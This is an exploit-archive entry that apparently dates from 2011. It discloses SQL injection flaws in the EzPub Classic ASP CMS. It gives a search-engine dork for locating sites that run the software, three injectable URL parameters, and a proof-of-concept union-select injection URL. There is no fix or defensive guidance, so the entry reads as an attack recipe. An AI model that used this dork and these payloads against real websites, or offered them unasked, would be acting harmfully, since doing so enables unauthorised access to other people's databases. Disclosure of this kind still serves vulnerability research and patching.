EzPub Simple Classic ASP CMS - SQL Injection
| EKU-ID: 22976 | CVE: | OSVDB-ID: |
| Author: p0pc0rn | Published: 2011-03-08 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 22976 | CVE: | OSVDB-ID: |
| Author: p0pc0rn | Published: 2011-03-08 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Title: EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection Vendor: http://www.soft4web.ro Found by: p0pc0rn 08/03/2011 Dork: intext:"Powered by EZPub" SQL - Microsoft JET Database Engine error ------------------------------------------ view_article.asp?item=[SQL] http://site.com/page.asp?pID=[SQL] http://site.com/display.asp?sortby=sections&sID=[SQL] POC --- http://site.com/view_article.asp?item=1 union select 1 from test.a thanks, -p0pc0rn-